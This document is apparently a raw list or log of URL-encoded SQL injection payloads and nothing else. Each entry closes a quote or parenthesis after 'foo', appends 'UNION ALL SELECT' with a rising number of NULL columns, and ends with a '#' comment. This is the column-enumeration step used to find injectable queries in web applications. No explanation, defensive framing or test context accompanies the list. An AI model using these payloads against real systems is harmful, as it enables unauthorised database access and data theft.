foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 